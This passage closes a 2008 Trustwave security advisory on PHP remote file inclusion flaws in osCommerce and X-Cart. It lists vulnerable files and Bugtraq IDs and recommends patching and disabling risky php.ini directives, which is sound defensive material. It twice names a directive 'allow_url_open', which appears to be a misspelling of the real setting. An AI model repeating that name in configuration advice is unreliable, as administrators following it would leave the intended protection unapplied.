of cardholder data.              Copyright 2008, Trustwave Page 4 of 5
  • 5. Remote file inclusion vulnerabilities in both the osCommerce and X‐Cart applications have been publicly  disclosed:    Remote file inclusion vulnerabilities  Application Vulnerable File Disclosure Date Reference osCommerce Online Merchant v2.1 include_once.php 06/16/2002 Bugtraq ID: 5037 Qualiteam X-Cart 4.x cmpi.php 09/08/2006 Bugtraq ID: 20108 Qualiteam X-Cart 3.5.0 config.php 09/11/2007 Bugtraq ID: 25637 prepare.php smarty.php product.php auth.php   Although the vendors listed above have released updates to patch the vulnerabilities, the root problem  lies on the application user’s side with the configuration of the PHP programming language on their  server.     E‐commerce merchants can easily avoid PHP remote file‐inclusion exploits by properly configuring the  PHP programming language installed on their server. The majority of PHP remote file‐inclusion exploits  are possible because of two configuration directives included within PHP; register_globals and  allow_url_open. When enabled, either of these directives may allow the inclusion of files from a remote site  for local execution.    An administrator can easily disable the register_globals and allow_url_open directives in the php.ini  configuration file. In PHP versions 4.2.0 or later, register_globals is disabled by default. In PHP 6.0, the  register_globals directive has been removed altogether.    In conclusion, to protect against PHP remote file‐inclusion exploits, Trustwave recommends that e‐ commerce merchants perform stringent code reviews to ensure that their e‐commerce applications are  properly patched and securely configured. At the very least, this process should include disabling the  register_globals and allow_url_open PHP directives in the php.ini configuration file.          About Trustwave   Trustwave is a global provider of information security and compliance management solutions to businesses and the  public sector. The company has serviced more than 30,000 organizations throughout the world including banks,  merchants, service providers and software developers that are required to validate compliance with industry best  practices for safeguarding information endorsed by American Express, Discover, MasterCard Worldwide, Visa  International and Visa USA. Trustwave is a leading certificate authority with thousands of secure sockets layer  (SSL) certificates issued. Trustwave is headquartered in Chicago with offices throughout North America, South  America, Europe, the Middle East, Africa, Asia and Australia.  Copyright 2008, Trustwave Page 5 of 5